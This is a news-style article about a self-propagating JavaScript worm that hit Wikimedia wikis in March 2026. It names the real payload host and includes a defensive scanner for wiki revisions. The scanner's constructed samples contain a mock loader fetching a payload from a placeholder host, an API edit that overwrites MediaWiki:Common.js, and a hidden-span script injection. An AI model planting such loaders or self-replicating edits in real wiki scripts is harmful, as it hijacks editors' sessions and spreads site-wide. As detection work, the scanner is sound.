A self-propagating JavaScript worm hit the Wikimedia Foundation on March 5, 2026, vandalizing pages on Meta-Wiki and infecting user scripts before engineers contained it within 23 minutes.
Editors first flagged the incident on Wikipedia’s Village Pump (technical), where a wave of automated edits began inserting hidden scripts and vandalism across random pages. Wikimedia engineers responded by temporarily restricting editing across projects while they investigated and started reverting changes.
How the Worm Spread
The attack traces back to a malicious script stored at User:Ololoshka562/test.js, first uploaded to Russian Wikipedia in March 2024 and linked to scripts used in previous attacks on wiki projects. According to Wikimedia’s Phabricator issue tracker, the incident began after that script was executed, causing a global JavaScript file to be overwritten with malicious code.
Edit histories suggest a Wikimedia employee account executed the script earlier that day while testing user-script functionality. Whether that execution was intentional, accidental, or the result of a compromised account remains unclear.
Once loaded in a logged-in editor’s browser, the script targeted two JavaScript pages at once. It overwrote the user’s personal common.js with a loader that would silently fetch the malicious script on every future page view. If the editor held the rights needed to edit site-wide scripts (on Wikimedia wikis, the interface-administrator right), it also rewrote the global MediaWiki:Common.js, which runs in the browser of every visitor, not just editors. Any editor who subsequently loaded that global file repeated the same cycle, spreading the infection further.
Vandalism Mechanism
Beyond propagation, the worm carried a vandalism routine. It requested the Special:Random page to pick a random article, then inserted an oversized image and a hidden JavaScript loader into that page’s wikitext:
- An embedded Woodpecker10.jpg image set to 5,000 pixels wide
- A concealed span element containing a script that loaded an external payload from basemetrika.ru
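The two behaviours described above, the self-replicating loader in the propagation section and the image-plus-hidden-span vandalism, are the kind of thing a wiki operator can screen for in recent changes. The scanner below is an added example written for this article; it is not code from Wikimedia or from the incident itself. It assumes a host allowlist, a 2,000px width threshold, and the constructed page titles and revision bodies embedded in it (the payload host `example.invalid` is a placeholder, not the domain named above). Only the pattern shapes come from the article: script loads by URL (`mw.loader.load`, `importScriptURI`, `$.getScript`, a `.src` assignment), API edits whose target is another `.js` page, oversized `[[File:...|NNNNpx]]` embeds, and `display:none` spans that carry a script or an external URL.

```javascript
// Added example, not code from the page or from Wikimedia: a scanner over
// revision text that flags the two behaviours the article describes.
//   JavaScript pages: script loads from hosts outside an allowlist, and API
//                     writes to other JavaScript pages (self-replication).
//   Wikitext pages:   an oversized image plus a hidden span carrying a
//                     script loader (the vandalism routine).
// The allowlist, width threshold, page titles and revision bodies below are
// constructed for this example; only the pattern shapes come from the article.

const TRUSTED_SCRIPT_HOSTS = new Set([
  "meta.wikimedia.org", "en.wikipedia.org", "ru.wikipedia.org", "www.wikidata.org",
]);
const MAX_IMAGE_WIDTH = 2000; // assumed threshold; the article's payload used 5000px

// Resolve an absolute or protocol-relative URL against the wiki and return its host.
function hostOf(url) {
  try {
    return new URL(url, "https://meta.wikimedia.org/").hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Calls that fetch and run a script by URL; the URL argument is captured.
const SCRIPT_LOAD_RE =
  /(?:mw\.loader\.load|importScriptURI|\$\.getScript|\.src\s*=)\s*\(?\s*["']((?:https?:)?\/\/[^"']+)["']/g;
// Signs that the script edits pages through the API (action=edit, postWithToken, api.edit).
const EDIT_API_RE = /action\s*[:=]\s*["']?edit|postWithToken|\.edit\s*\(/;
// Edit targets that are themselves JavaScript pages (User:X/common.js, MediaWiki:Common.js, ...).
const JS_TARGET_RE = /title\s*[:=]\s*["']([^"']*\.js)["']/g;

function scanUserScript(title, js) {
  const findings = [];
  const hosts = new Set();
  for (const m of js.matchAll(SCRIPT_LOAD_RE)) {
    const host = hostOf(m[1]);
    if (host && !TRUSTED_SCRIPT_HOSTS.has(host)) hosts.add(host);
  }
  if (hosts.size) findings.push({ kind: "external-script-load", title, hosts: [...hosts] });
  const targets = [...js.matchAll(JS_TARGET_RE)].map((m) => m[1]);
  if (targets.length && EDIT_API_RE.test(js)) {
    findings.push({ kind: "js-page-write", title, targets });
  }
  return findings;
}

function scanWikitext(title, wikitext) {
  const findings = [];
  for (const m of wikitext.matchAll(/\[\[(?:File|Image):([^\]|]+)\|[^\]]*?(\d{3,5})px/gi)) {
    const width = Number(m[2]);
    if (width >= MAX_IMAGE_WIDTH) {
      findings.push({ kind: "oversized-image", title, file: m[1].trim(), width });
    }
  }
  for (const m of wikitext.matchAll(/<span\b[^>]*display\s*:\s*none[^>]*>([\s\S]*?)<\/span>/gi)) {
    const inner = m[1];
    const hosts = [...inner.matchAll(/(?:https?:)?\/\/[^\s"'<>]+/g)]
      .map((u) => hostOf(u[0]))
      .filter((h) => h && !TRUSTED_SCRIPT_HOSTS.has(h));
    if (/<script\b/i.test(inner) || hosts.length) {
      findings.push({ kind: "hidden-span-loader", title, hosts });
    }
  }
  return findings;
}

// Dispatch on the page's content model, as a recent-changes feed would expose it.
function scanRevisions(revisions) {
  return revisions.flatMap((r) =>
    r.contentModel === "javascript" ? scanUserScript(r.title, r.text) : scanWikitext(r.title, r.text));
}

// Constructed revisions: a benign user script, one shaped like the loader the
// article describes, a vandalised article body, and an ordinary edit.
const SAMPLE_REVISIONS = [
  { title: "User:Alice/common.js", contentModel: "javascript",
    text: 'importScript("User:Alice/tools.js");\n' +
          'mw.loader.load("//en.wikipedia.org/w/index.php?title=User:Alice/tools.js&action=raw&ctype=text/javascript");' },
  { title: "User:Bob/common.js", contentModel: "javascript",
    text: 'mw.loader.load("https://example.invalid/payload.js");\n' +
          'new mw.Api().postWithToken("csrf", { action: "edit", title: "MediaWiki:Common.js",\n' +
          '  text: "mw.loader.load(\'https://example.invalid/payload.js\');" });' },
  { title: "Some article", contentModel: "wikitext",
    text: '[[File:Woodpecker10.jpg|5000px]]\n' +
          '<span style="display:none"><script src="https://example.invalid/payload.js"></script></span>' },
  { title: "Another article", contentModel: "wikitext",
    text: "[[File:Map.png|thumb|300px|Caption]]" },
];

for (const f of scanRevisions(SAMPLE_REVISIONS)) console.log(JSON.stringify(f));
```

Run over the constructed revisions, the scanner reports nothing for Alice (her loads stay on trusted hosts and `importScript` takes a page title, not a URL), two findings for Bob (an external load and an API write to MediaWiki:Common.js), and two for the vandalised article (the 5,000px image and the hidden loader). The host allowlist is the important tuning knob: a wiki farm that legitimately cross-loads scripts between its own projects needs every such host listed, or the scanner drowns in false positives.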
By the time engineers halted the spread, 3,996 pages had been modified and around 85 users had their common.js replaced. The number of pages that had to be deleted is not yet confirmed.
Response and Containment
Wikimedia staff rolled back the malicious common.js changes for affected users across the platform and suppressed the offending revisions so they no longer appear in page histories. The injected code has since been removed, and editing access was restored.
The Wikimedia Foundation confirmed in a statement that the worm was active for only 23 minutes and that content changes were limited to Meta-Wiki, all of which have since been restored. The foundation noted that staff had been conducting a security review of user-authored code when the incident occurred.
No detailed post-incident report has been published explaining precisely how the dormant script was triggered or the full scope of propagation before containment. The episode exposes a structural risk in wiki platforms that execute user-authored JavaScript with the session and permissions of whoever loads it: a single privileged account loading malicious code can initiate a site-wide chain reaction.
This article is a curated summary based on third-party sources.